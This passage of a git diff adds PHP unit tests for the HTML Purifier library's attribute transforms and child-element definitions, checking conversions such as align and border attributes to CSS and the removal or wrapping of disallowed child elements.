{ + parent::setUp(); + $this->obj = new HTMLPurifier_AttrTransform_Border(); + } + + function testEmptyInput() { + $this->assertResult( array() ); + } + + function testBasicTransform() { + $this->assertResult( + array('border' => '1'), + array('style' => 'border:1px solid;') + ); + } + + function testLenientTreatmentOfInvalidInput() { + $this->assertResult( + array('border' => '10%'), + array('style' => 'border:10%px solid;') + ); + } + + function testPrependNewCSS() { + $this->assertResult( + array('border' => '23', 'style' => 'font-weight:bold;'), + array('style' => 'border:23px solid;font-weight:bold;') + ); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/AttrTransform/EnumToCSSTest.php b/lib/htmlpurifier/tests/HTMLPurifier/AttrTransform/EnumToCSSTest.php new file mode 100644 index 000000000..f0381fe88 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/AttrTransform/EnumToCSSTest.php @@ -0,0 +1,73 @@ +<?php + +class HTMLPurifier_AttrTransform_EnumToCSSTest extends HTMLPurifier_AttrTransformHarness +{ + + function setUp() { + parent::setUp(); + $this->obj = new HTMLPurifier_AttrTransform_EnumToCSS('align', array( + 'left' => 'text-align:left;', + 'right' => 'text-align:right;' + )); + } + + function testEmptyInput() { + $this->assertResult( array() ); + } + + function testPreserveArraysWithoutInterestingAttributes() { + $this->assertResult( array('style' => 'font-weight:bold;') ); + } + + function testConvertAlignLeft() { + $this->assertResult( + array('align' => 'left'), + array('style' => 'text-align:left;') + ); + } + + function testConvertAlignRight() { + $this->assertResult( + array('align' => 'right'), + array('style' => 'text-align:right;') + ); + } + + function testRemoveInvalidAlign() { + $this->assertResult( + array('align' => 'invalid'), + array() + ); + } + + function testPrependNewCSS() { + $this->assertResult( + array('align' => 'left', 'style' => 'font-weight:bold;'), + array('style' => 'text-align:left;font-weight:bold;') + ); + + } + + function testCaseInsensitive() { + $this->obj = new HTMLPurifier_AttrTransform_EnumToCSS('align', array( + 'right' => 'text-align:right;' + )); + $this->assertResult( + array('align' => 'RIGHT'), + array('style' => 'text-align:right;') + ); + } + + function testCaseSensitive() { + $this->obj = new HTMLPurifier_AttrTransform_EnumToCSS('align', array( + 'right' => 'text-align:right;' + ), true); + $this->assertResult( + array('align' => 'RIGHT'), + array() + ); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/AttrTransform/ImgRequiredTest.php b/lib/htmlpurifier/tests/HTMLPurifier/AttrTransform/ImgRequiredTest.php new file mode 100644 index 000000000..99f0a03e9 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/AttrTransform/ImgRequiredTest.php @@ -0,0 +1,55 @@ +<?php + +class HTMLPurifier_AttrTransform_ImgRequiredTest extends HTMLPurifier_AttrTransformHarness +{ + + function setUp() { + parent::setUp(); + $this->obj = new HTMLPurifier_AttrTransform_ImgRequired(); + } + + function testAddMissingAttr() { + $this->config->set('Core.RemoveInvalidImg', false); + $this->assertResult( + array(), + array('src' => '', 'alt' => 'Invalid image') + ); + } + + function testAlternateDefaults() { + $this->config->set('Attr.DefaultInvalidImage', 'blank.png'); + $this->config->set('Attr.DefaultInvalidImageAlt', 'Pawned!'); + $this->config->set('Attr.DefaultImageAlt', 'not pawned'); + $this->config->set('Core.RemoveInvalidImg', false); + $this->assertResult( + array(), + array('src' => 'blank.png', 'alt' => 'Pawned!') + ); + } + + function testGenerateAlt() { + $this->assertResult( + array('src' => '/path/to/foobar.png'), + array('src' => '/path/to/foobar.png', 'alt' => 'foobar.png') + ); + } + + function testAddDefaultSrc() { + $this->config->set('Core.RemoveInvalidImg', false); + $this->assertResult( + array('alt' => 'intrigue'), + array('alt' => 'intrigue', 'src' => '') + ); + } + + function testAddDefaultAlt() { + $this->config->set('Attr.DefaultImageAlt', 'default'); + $this->assertResult( + array('src' => ''), + array('src' => '', 'alt' => 'default') + ); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/AttrTransform/ImgSpaceTest.php b/lib/htmlpurifier/tests/HTMLPurifier/AttrTransform/ImgSpaceTest.php new file mode 100644 index 000000000..42e8738e4 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/AttrTransform/ImgSpaceTest.php @@ -0,0 +1,55 @@ +<?php + +class HTMLPurifier_AttrTransform_ImgSpaceTest extends HTMLPurifier_AttrTransformHarness +{ + + function setUp() { + parent::setUp(); + $this->obj = new HTMLPurifier_AttrTransform_ImgSpace('vspace'); + } + + function testEmptyInput() { + $this->assertResult( array() ); + } + + function testVerticalBasicUsage() { + $this->assertResult( + array('vspace' => '1'), + array('style' => 'margin-top:1px;margin-bottom:1px;') + ); + } + + function testLenientHandlingOfInvalidInput() { + $this->assertResult( + array('vspace' => '10%'), + array('style' => 'margin-top:10%px;margin-bottom:10%px;') + ); + } + + function testPrependNewCSS() { + $this->assertResult( + array('vspace' => '23', 'style' => 'font-weight:bold;'), + array('style' => 'margin-top:23px;margin-bottom:23px;font-weight:bold;') + ); + } + + function testHorizontalBasicUsage() { + $this->obj = new HTMLPurifier_AttrTransform_ImgSpace('hspace'); + $this->assertResult( + array('hspace' => '1'), + array('style' => 'margin-left:1px;margin-right:1px;') + ); + } + + function testInvalidConstructionParameter() { + $this->expectError('ispace is not valid space attribute'); + $this->obj = new HTMLPurifier_AttrTransform_ImgSpace('ispace'); + $this->assertResult( + array('ispace' => '1'), + array() + ); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/AttrTransform/InputTest.php b/lib/htmlpurifier/tests/HTMLPurifier/AttrTransform/InputTest.php new file mode 100644 index 000000000..2603ff1be --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/AttrTransform/InputTest.php @@ -0,0 +1,94 @@ +<?php + +class HTMLPurifier_AttrTransform_InputTest extends HTMLPurifier_AttrTransformHarness +{ + + function setUp() { + parent::setUp(); + $this->obj = new HTMLPurifier_AttrTransform_Input(); + } + + function testEmptyInput() { + $this->assertResult(array()); + } + + function testInvalidCheckedWithEmpty() { + $this->assertResult(array('checked' => 'checked'), array()); + } + + function testInvalidCheckedWithPassword() { + $this->assertResult(array( + 'checked' => 'checked', + 'type' => 'password' + ), array( + 'type' => 'password' + )); + } + + function testValidCheckedWithUcCheckbox() { + $this->assertResult(array( + 'checked' => 'checked', + 'type' => 'CHECKBOX', + 'value' => 'bar', + )); + } + + function testInvalidMaxlength() { + $this->assertResult(array( + 'maxlength' => '10', + 'type' => 'checkbox', + 'value' => 'foo', + ), array( + 'type' => 'checkbox', + 'value' => 'foo', + )); + } + + function testValidMaxLength() { + $this->assertResult(array( + 'maxlength' => '10', + )); + } + + // these two are really bad test-cases + + function testSizeWithCheckbox() { + $this->assertResult(array( + 'type' => 'checkbox', + 'value' => 'foo', + 'size' => '100px', + ), array( + 'type' => 'checkbox', + 'value' => 'foo', + 'size' => '100', + )); + } + + function testSizeWithText() { + $this->assertResult(array( + 'type' => 'password', + 'size' => '100px', // spurious value, to indicate no validation takes place + ), array( + 'type' => 'password', + 'size' => '100px', + )); + } + + function testInvalidSrc() { + $this->assertResult(array( + 'src' => 'img.png', + ), array()); + } + + function testMissingValue() { + $this->assertResult(array( + 'type' => 'checkbox', + ), array( + 'type' => 'checkbox', + 'value' => '', + )); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/AttrTransform/LangTest.php b/lib/htmlpurifier/tests/HTMLPurifier/AttrTransform/LangTest.php new file mode 100644 index 000000000..960ad20a0 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/AttrTransform/LangTest.php @@ -0,0 +1,46 @@ +<?php + +class HTMLPurifier_AttrTransform_LangTest + extends HTMLPurifier_AttrTransformHarness +{ + + function setUp() { + parent::setUp(); + $this->obj = new HTMLPurifier_AttrTransform_Lang(); + } + + function testEmptyInput() { + $this->assertResult(array()); + } + + function testCopyLangToXMLLang() { + $this->assertResult( + array('lang' => 'en'), + array('lang' => 'en', 'xml:lang' => 'en') + ); + } + + function testPreserveAttributes() { + $this->assertResult( + array('src' => 'vert.png', 'lang' => 'fr'), + array('src' => 'vert.png', 'lang' => 'fr', 'xml:lang' => 'fr') + ); + } + + function testCopyXMLLangToLang() { + $this->assertResult( + array('xml:lang' => 'en'), + array('xml:lang' => 'en', 'lang' => 'en') + ); + } + + function testXMLLangOverridesLang() { + $this->assertResult( + array('lang' => 'fr', 'xml:lang' => 'de'), + array('lang' => 'de', 'xml:lang' => 'de') + ); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/AttrTransform/LengthTest.php b/lib/htmlpurifier/tests/HTMLPurifier/AttrTransform/LengthTest.php new file mode 100644 index 000000000..3fbaa0ccf --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/AttrTransform/LengthTest.php @@ -0,0 +1,45 @@ +<?php + +class HTMLPurifier_AttrTransform_LengthTest extends HTMLPurifier_AttrTransformHarness +{ + + function setUp() { + parent::setUp(); + $this->obj = new HTMLPurifier_AttrTransform_Length('width'); + } + + function testEmptyInput() { + $this->assertResult( array() ); + } + + function testTransformPixel() { + $this->assertResult( + array('width' => '10'), + array('style' => 'width:10px;') + ); + } + + function testTransformPercentage() { + $this->assertResult( + array('width' => '10%'), + array('style' => 'width:10%;') + ); + } + + function testPrependNewCSS() { + $this->assertResult( + array('width' => '10%', 'style' => 'font-weight:bold'), + array('style' => 'width:10%;font-weight:bold') + ); + } + + function testLenientTreatmentOfInvalidInput() { + $this->assertResult( + array('width' => 'asdf'), + array('style' => 'width:asdf;') + ); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/AttrTransform/NameSyncTest.php b/lib/htmlpurifier/tests/HTMLPurifier/AttrTransform/NameSyncTest.php new file mode 100644 index 000000000..bae4a8d03 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/AttrTransform/NameSyncTest.php @@ -0,0 +1,40 @@ +<?php + +class HTMLPurifier_AttrTransform_NameSyncTest extends HTMLPurifier_AttrTransformHarness +{ + + function setUp() { + parent::setUp(); + $this->obj = new HTMLPurifier_AttrTransform_NameSync(); + $this->accumulator = new HTMLPurifier_IDAccumulator(); + $this->context->register('IDAccumulator', $this->accumulator); + $this->config->set('Attr.EnableID', true); + } + + function testEmpty() { + $this->assertResult( array() ); + } + + function testAllowSame() { + $this->assertResult( + array('name' => 'free', 'id' => 'free') + ); + } + + function testAllowDifferent() { + $this->assertResult( + array('name' => 'tryit', 'id' => 'thisgood') + ); + } + + function testCheckName() { + $this->accumulator->add('notok'); + $this->assertResult( + array('name' => 'notok', 'id' => 'ok'), + array('id' => 'ok') + ); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/AttrTransform/NameTest.php b/lib/htmlpurifier/tests/HTMLPurifier/AttrTransform/NameTest.php new file mode 100644 index 000000000..10e121238 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/AttrTransform/NameTest.php @@ -0,0 +1,31 @@ +<?php + +class HTMLPurifier_AttrTransform_NameTest extends HTMLPurifier_AttrTransformHarness +{ + + function setUp() { + parent::setUp(); + $this->obj = new HTMLPurifier_AttrTransform_Name(); + } + + function testEmpty() { + $this->assertResult( array() ); + } + + function testTransformNameToID() { + $this->assertResult( + array('name' => 'free'), + array('id' => 'free') + ); + } + + function testExistingIDOverridesName() { + $this->assertResult( + array('name' => 'tryit', 'id' => 'tobad'), + array('id' => 'tobad') + ); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/AttrTransformHarness.php b/lib/htmlpurifier/tests/HTMLPurifier/AttrTransformHarness.php new file mode 100644 index 000000000..d43c0108f --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/AttrTransformHarness.php @@ -0,0 +1,13 @@ +<?php + +class HTMLPurifier_AttrTransformHarness extends HTMLPurifier_ComplexHarness +{ + + public function setUp() { + parent::setUp(); + $this->func = 'transform'; + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/AttrTransformTest.php b/lib/htmlpurifier/tests/HTMLPurifier/AttrTransformTest.php new file mode 100644 index 000000000..71a788580 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/AttrTransformTest.php @@ -0,0 +1,45 @@ +<?php + +Mock::generatePartial( + 'HTMLPurifier_AttrTransform', + 'HTMLPurifier_AttrTransformTestable', + array('transform')); + +class HTMLPurifier_AttrTransformTest extends HTMLPurifier_Harness +{ + + function test_prependCSS() { + + $t = new HTMLPurifier_AttrTransformTestable(); + + $attr = array(); + $t->prependCSS($attr, 'style:new;'); + $this->assertIdentical(array('style' => 'style:new;'), $attr); + + $attr = array('style' => 'style:original;'); + $t->prependCSS($attr, 'style:new;'); + $this->assertIdentical(array('style' => 'style:new;style:original;'), $attr); + + $attr = array('style' => 'style:original;', 'misc' => 'un-related'); + $t->prependCSS($attr, 'style:new;'); + $this->assertIdentical(array('style' => 'style:new;style:original;', 'misc' => 'un-related'), $attr); + + } + + function test_confiscateAttr() { + + $t = new HTMLPurifier_AttrTransformTestable(); + + $attr = array('flavor' => 'sweet'); + $this->assertIdentical('sweet', $t->confiscateAttr($attr, 'flavor')); + $this->assertIdentical(array(), $attr); + + $attr = array('flavor' => 'sweet'); + $this->assertIdentical(null, $t->confiscateAttr($attr, 'color')); + $this->assertIdentical(array('flavor' => 'sweet'), $attr); + + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/AttrTypesTest.php b/lib/htmlpurifier/tests/HTMLPurifier/AttrTypesTest.php new file mode 100644 index 000000000..d1ae43709 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/AttrTypesTest.php @@ -0,0 +1,26 @@ +<?php + +class HTMLPurifier_AttrTypesTest extends HTMLPurifier_Harness +{ + + function test_get() { + $types = new HTMLPurifier_AttrTypes(); + + $this->assertIdentical( + $types->get('CDATA'), + new HTMLPurifier_AttrDef_Text() + ); + + $this->expectError('Cannot retrieve undefined attribute type foobar'); + $types->get('foobar'); + + $this->assertIdentical( + $types->get('Enum#foo,bar'), + new HTMLPurifier_AttrDef_Enum(array('foo', 'bar')) + ); + + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/AttrValidator_ErrorsTest.php b/lib/htmlpurifier/tests/HTMLPurifier/AttrValidator_ErrorsTest.php new file mode 100644 index 000000000..307d3292b --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/AttrValidator_ErrorsTest.php @@ -0,0 +1,66 @@ +<?php + +class HTMLPurifier_AttrValidator_ErrorsTest extends HTMLPurifier_ErrorsHarness +{ + + public function setup() { + parent::setup(); + $config = HTMLPurifier_Config::createDefault(); + $this->language = HTMLPurifier_LanguageFactory::instance()->create($config, $this->context); + $this->context->register('Locale', $this->language); + $this->collector = new HTMLPurifier_ErrorCollector($this->context); + $this->context->register('Generator', new HTMLPurifier_Generator($config, $this->context)); + } + + protected function invoke($input) { + $validator = new HTMLPurifier_AttrValidator(); + $validator->validateToken($input, $this->config, $this->context); + } + + function testAttributesTransformedGlobalPre() { + $def = $this->config->getHTMLDefinition(true); + generate_mock_once('HTMLPurifier_AttrTransform'); + $transform = new HTMLPurifier_AttrTransformMock(); + $input = array('original' => 'value'); + $output = array('class' => 'value'); // must be valid + $transform->setReturnValue('transform', $output, array($input, new AnythingExpectation(), new AnythingExpectation())); + $def->info_attr_transform_pre[] = $transform; + + $token = new HTMLPurifier_Token_Start('span', $input, 1); + $this->invoke($token); + + $result = $this->collector->getRaw(); + $expect = array( + array(1, E_NOTICE, 'Attributes on <span> transformed from original to class', array()), + ); + $this->assertIdentical($result, $expect); + } + + function testAttributesTransformedLocalPre() { + $this->config->set('HTML.TidyLevel', 'heavy'); + $input = array('align' => 'right'); + $output = array('style' => 'text-align:right;'); + $token = new HTMLPurifier_Token_Start('p', $input, 1); + $this->invoke($token); + $result = $this->collector->getRaw(); + $expect = array( + array(1, E_NOTICE, 'Attributes on <p> transformed from align to style', array()), + ); + $this->assertIdentical($result, $expect); + } + + // too lazy to check for global post and global pre + + function testAttributeRemoved() { + $token = new HTMLPurifier_Token_Start('p', array('foobar' => 'right'), 1); + $this->invoke($token); + $result = $this->collector->getRaw(); + $expect = array( + array(1, E_ERROR, 'foobar attribute on <p> removed', array()), + ); + $this->assertIdentical($result, $expect); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/ChildDef/ChameleonTest.php b/lib/htmlpurifier/tests/HTMLPurifier/ChildDef/ChameleonTest.php new file mode 100644 index 000000000..82493f40e --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/ChildDef/ChameleonTest.php @@ -0,0 +1,40 @@ +<?php + +class HTMLPurifier_ChildDef_ChameleonTest extends HTMLPurifier_ChildDefHarness +{ + + protected $isInline; + + function setUp() { + parent::setUp(); + $this->obj = new HTMLPurifier_ChildDef_Chameleon( + 'b | i', // allowed only when in inline context + 'b | i | div' // allowed only when in block context + ); + $this->context->register('IsInline', $this->isInline); + } + + function testInlineAlwaysAllowed() { + $this->isInline = true; + $this->assertResult( + '<b>Allowed.</b>' + ); + } + + function testBlockNotAllowedInInline() { + $this->isInline = true; + $this->assertResult( + '<div>Not allowed.</div>', '' + ); + } + + function testBlockAllowedInNonInline() { + $this->isInline = false; + $this->assertResult( + '<div>Allowed.</div>' + ); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/ChildDef/CustomTest.php b/lib/htmlpurifier/tests/HTMLPurifier/ChildDef/CustomTest.php new file mode 100644 index 000000000..5b138a3c1 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/ChildDef/CustomTest.php @@ -0,0 +1,89 @@ +<?php + +class HTMLPurifier_ChildDef_CustomTest extends HTMLPurifier_ChildDefHarness +{ + + function test() { + + $this->obj = new HTMLPurifier_ChildDef_Custom('(a,b?,c*,d+,(a,b)*)'); + + $this->assertEqual($this->obj->elements, array('a' => true, + 'b' => true, 'c' => true, 'd' => true)); + + $this->assertResult('', false); + $this->assertResult('<a /><a />', false); + + $this->assertResult('<a /><b /><c /><d /><a /><b />'); + $this->assertResult('<a /><d>Dob</d><a /><b>foo</b>'. + '<a href="moo" /><b>foo</b>'); + + } + + function testNesting() { + $this->obj = new HTMLPurifier_ChildDef_Custom('(a,b,(c|d))+'); + $this->assertEqual($this->obj->elements, array('a' => true, + 'b' => true, 'c' => true, 'd' => true)); + $this->assertResult('', false); + $this->assertResult('<a /><b /><c /><a /><b /><d />'); + $this->assertResult('<a /><b /><c /><d />', false); + } + + function testNestedEitherOr() { + $this->obj = new HTMLPurifier_ChildDef_Custom('b,(a|(c|d))+'); + $this->assertEqual($this->obj->elements, array('a' => true, + 'b' => true, 'c' => true, 'd' => true)); + $this->assertResult('', false); + $this->assertResult('<b /><a /><c /><d />'); + $this->assertResult('<b /><d /><a /><a />'); + $this->assertResult('<b /><a />'); + $this->assertResult('<acd />', false); + } + + function testNestedQuantifier() { + $this->obj = new HTMLPurifier_ChildDef_Custom('(b,c+)*'); + $this->assertEqual($this->obj->elements, array('b' => true, 'c' => true)); + $this->assertResult(''); + $this->assertResult('<b /><c />'); + $this->assertResult('<b /><c /><c /><c />'); + $this->assertResult('<b /><c /><b /><c />'); + $this->assertResult('<b /><c /><b />', false); + } + + function testEitherOr() { + + $this->obj = new HTMLPurifier_ChildDef_Custom('a|b'); + $this->assertEqual($this->obj->elements, array('a' => true, 'b' => true)); + $this->assertResult('', false); + $this->assertResult('<a />'); + $this->assertResult('<b />'); + $this->assertResult('<a /><b />', false); + + } + + function testCommafication() { + + $this->obj = new HTMLPurifier_ChildDef_Custom('a,b'); + $this->assertEqual($this->obj->elements, array('a' => true, 'b' => true)); + $this->assertResult('<a /><b />'); + $this->assertResult('<ab />', false); + + } + + function testPcdata() { + $this->obj = new HTMLPurifier_ChildDef_Custom('#PCDATA,a'); + $this->assertEqual($this->obj->elements, array('#PCDATA' => true, 'a' => true)); + $this->assertResult('foo<a />'); + $this->assertResult('<a />', false); + } + + function testWhitespace() { + $this->obj = new HTMLPurifier_ChildDef_Custom('a'); + $this->assertEqual($this->obj->elements, array('a' => true)); + $this->assertResult('foo<a />', false); + $this->assertResult('<a />'); + $this->assertResult(' <a />'); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/ChildDef/ListTest.php b/lib/htmlpurifier/tests/HTMLPurifier/ChildDef/ListTest.php new file mode 100644 index 000000000..02dcab0fb --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/ChildDef/ListTest.php @@ -0,0 +1,50 @@ +<?php + +class HTMLPurifier_ChildDef_ListTest extends HTMLPurifier_ChildDefHarness +{ + + function setUp() { + parent::setUp(); + $this->obj = new HTMLPurifier_ChildDef_List(); + } + + function testEmptyInput() { + $this->assertResult('', false); + } + + function testSingleLi() { + $this->assertResult('<li />'); + } + + function testSomeLi() { + $this->assertResult('<li>asdf</li><li />'); + } + + function testIllegal() { + // XXX actually this never gets triggered in practice + $this->assertResult('<li /><b />', '<li /><li><b /></li>'); + } + + function testOlAtBeginning() { + $this->assertResult('<ol />', '<li><ol /></li>'); + } + + function testOlAtBeginningWithOtherJunk() { + $this->assertResult('<ol /><li />', '<li><ol /></li><li />'); + } + + function testOlInMiddle() { + $this->assertResult('<li>Foo</li><ol><li>Bar</li></ol>', '<li>Foo<ol><li>Bar</li></ol></li>'); + } + + function testMultipleOl() { + $this->assertResult('<li /><ol /><ol />', '<li><ol /><ol /></li>'); + } + + function testUlAtBeginning() { + $this->assertResult('<ul />', '<li><ul /></li>'); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/ChildDef/OptionalTest.php b/lib/htmlpurifier/tests/HTMLPurifier/ChildDef/OptionalTest.php new file mode 100644 index 000000000..a5f34f7b1 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/ChildDef/OptionalTest.php @@ -0,0 +1,33 @@ +<?php + +class HTMLPurifier_ChildDef_OptionalTest extends HTMLPurifier_ChildDefHarness +{ + + function setUp() { + parent::setUp(); + $this->obj = new HTMLPurifier_ChildDef_Optional('b | i'); + } + + function testBasicUsage() { + $this->assertResult('<b>Bold text</b><img />', '<b>Bold text</b>'); + } + + function testRemoveForbiddenText() { + $this->assertResult('Not allowed text', ''); + } + + function testEmpty() { + $this->assertResult(''); + } + + function testWhitespace() { + $this->assertResult(' '); + } + + function testMultipleWhitespace() { + $this->assertResult(' '); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/ChildDef/RequiredTest.php b/lib/htmlpurifier/tests/HTMLPurifier/ChildDef/RequiredTest.php new file mode 100644 index 000000000..8bb4f45ee --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/ChildDef/RequiredTest.php @@ -0,0 +1,73 @@ +<?php + +class HTMLPurifier_ChildDef_RequiredTest extends HTMLPurifier_ChildDefHarness +{ + + function testPrepareString() { + $def = new HTMLPurifier_ChildDef_Required('foobar | bang |gizmo'); + $this->assertIdentical($def->elements, + array( + 'foobar' => true + ,'bang' => true + ,'gizmo' => true + )); + } + + function testPrepareArray() { + $def = new HTMLPurifier_ChildDef_Required(array('href', 'src')); + $this->assertIdentical($def->elements, + array( + 'href' => true + ,'src' => true + )); + } + + function setUp() { + parent::setUp(); + $this->obj = new HTMLPurifier_ChildDef_Required('dt | dd'); + } + + function testEmptyInput() { + $this->assertResult('', false); + } + + function testRemoveIllegalTagsAndElements() { + $this->assertResult( + '<dt>Term</dt>Text in an illegal location'. + '<dd>Definition</dd><b>Illegal tag</b>', + '<dt>Term</dt><dd>Definition</dd>'); + $this->assertResult('How do you do!', false); + } + + function testIgnoreWhitespace() { + // whitespace shouldn't trigger it + $this->assertResult("\n<dd>Definition</dd> "); + } + + function testPreserveWhitespaceAfterRemoval() { + $this->assertResult( + '<dd>Definition</dd> <b></b> ', + '<dd>Definition</dd> ' + ); + } + + function testDeleteNodeIfOnlyWhitespace() { + $this->assertResult("\t ", false); + } + + function testPCDATAAllowed() { + $this->obj = new HTMLPurifier_ChildDef_Required('#PCDATA | b'); + $this->assertResult('Out <b>Bold text</b><img />', 'Out <b>Bold text</b>'); + } + + function testPCDATAAllowedWithEscaping() { + $this->obj = new HTMLPurifier_ChildDef_Required('#PCDATA | b'); + $this->config->set('Core.EscapeInvalidChildren', true); + $this->assertResult( + 'Out <b>Bold text</b><img />', + 'Out <b>Bold text</b><img />' + ); + } +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/ChildDef/StrictBlockquoteTest.php b/lib/htmlpurifier/tests/HTMLPurifier/ChildDef/StrictBlockquoteTest.php new file mode 100644 index 000000000..52594b1a0 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/ChildDef/StrictBlockquoteTest.php @@ -0,0 +1,83 @@ +<?php + +class HTMLPurifier_ChildDef_StrictBlockquoteTest +extends HTMLPurifier_ChildDefHarness +{ + + function setUp() { + parent::setUp(); + $this->obj = new HTMLPurifier_ChildDef_StrictBlockquote('div | p'); + } + + function testEmptyInput() { + $this->assertResult(''); + } + + function testPreserveValidP() { + $this->assertResult('<p>Valid</p>'); + } + + function testPreserveValidDiv() { + $this->assertResult('<div>Still valid</div>'); + } + + function testWrapTextWithP() { + $this->assertResult('Needs wrap', '<p>Needs wrap</p>'); + } + + function testNoWrapForWhitespaceOrValidElements() { + $this->assertResult('<p>Do not wrap</p> <p>Whitespace</p>'); + } + + function testWrapTextNextToValidElements() { + $this->assertResult( + 'Wrap'. '<p>Do not wrap</p>', + '<p>Wrap</p><p>Do not wrap</p>' + ); + } + + function testWrapInlineElements() { + $this->assertResult( + '<p>Do not</p>'.'<b>Wrap</b>', + '<p>Do not</p><p><b>Wrap</b></p>' + ); + } + + function testWrapAndRemoveInvalidTags() { + $this->assertResult( + '<li>Not allowed</li>Paragraph.<p>Hmm.</p>', + '<p>Not allowedParagraph.</p><p>Hmm.</p>' + ); + } + + function testWrapComplicatedSring() { + $this->assertResult( + $var = 'He said<br />perhaps<br />we should <b>nuke</b> them.', + "<p>$var</p>" + ); + } + + function testWrapAndRemoveInvalidTagsComplex() { + $this->assertResult( + '<foo>Bar</foo><bas /><b>People</b>Conniving.'. '<p>Fools!</p>', + '<p>Bar'. '<b>People</b>Conniving.</p><p>Fools!</p>' + ); + } + + function testAlternateWrapper() { + $this->config->set('HTML.BlockWrapper', 'div'); + $this->assertResult('Needs wrap', '<div>Needs wrap</div>'); + + } + + function testError() { + $this->expectError('Cannot use non-block element as block wrapper'); + $this->obj = new HTMLPurifier_ChildDef_StrictBlockquote('div | p'); + $this->config->set('HTML.BlockWrapper', 'dav'); + $this->config->set('Cache.DefinitionImpl', null); + $this->assertResult('Needs wrap', '<p>Needs wrap</p>'); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/ChildDef/TableTest.php b/lib/htmlpurifier/tests/HTMLPurifier/ChildDef/TableTest.php new file mode 100644 index 000000000..2f72d187a --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/ChildDef/TableTest.php @@ -0,0 +1,75 @@ +<?php + +// we're using empty tags to compact the tests: under real circumstances +// there would be contents in them + +class HTMLPurifier_ChildDef_TableTest extends HTMLPurifier_ChildDefHarness +{ + + function setUp() { + parent::setUp(); + $this->obj = new HTMLPurifier_ChildDef_Table(); + } + + function testEmptyInput() { + $this->assertResult('', false); + } + + function testSingleRow() { + $this->assertResult('<tr />'); + } + + function testComplexContents() { + $this->assertResult('<caption /><col /><thead /><tfoot /><tbody>'. + '<tr><td>asdf</td></tr></tbody>'); + $this->assertResult('<col /><col /><col /><tr />'); + } + + function testReorderContents() { + $this->assertResult( + '<col /><colgroup /><tbody /><tfoot /><thead /><tr>1</tr><caption /><tr />', + '<caption /><col /><colgroup /><thead /><tfoot /><tbody /><tbody><tr>1</tr><tr /></tbody>'); + } + + function testXhtml11Illegal() { + $this->assertResult( + '<thead><tr><th>a</th></tr></thead><tr><td>a</td></tr>', + '<thead><tr><th>a</th></tr></thead><tbody><tr><td>a</td></tr></tbody>' + ); + } + + function testTrOverflowAndClose() { + $this->assertResult( + '<tr><td>a</td></tr><tr><td>b</td></tr><tbody><tr><td>c</td></tr></tbody><tr><td>d</td></tr>', + '<tbody><tr><td>a</td></tr><tr><td>b</td></tr></tbody><tbody><tr><td>c</td></tr></tbody><tbody><tr><td>d</td></tr></tbody>' + ); + } + + function testDuplicateProcessing() { + $this->assertResult( + '<caption>1</caption><caption /><tbody /><tbody /><tfoot>1</tfoot><tfoot />', + '<caption>1</caption><tfoot>1</tfoot><tbody /><tbody /><tbody />' + ); + } + + function testRemoveText() { + $this->assertResult('foo', false); + } + + function testStickyWhitespaceOnTr() { + $this->config->set('Output.Newline', "\n"); + $this->assertResult("\n <tr />\n <tr />\n "); + } + + function testStickyWhitespaceOnTSection() { + $this->config->set('Output.Newline', "\n"); + $this->assertResult( + "\n\t<tbody />\n\t\t<tfoot />\n\t\t\t", + "\n\t\t<tfoot />\n\t<tbody />\n\t\t\t" + ); + + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/ChildDefHarness.php b/lib/htmlpurifier/tests/HTMLPurifier/ChildDefHarness.php new file mode 100644 index 000000000..4b4d2f5b6 --- /dev/null +++ 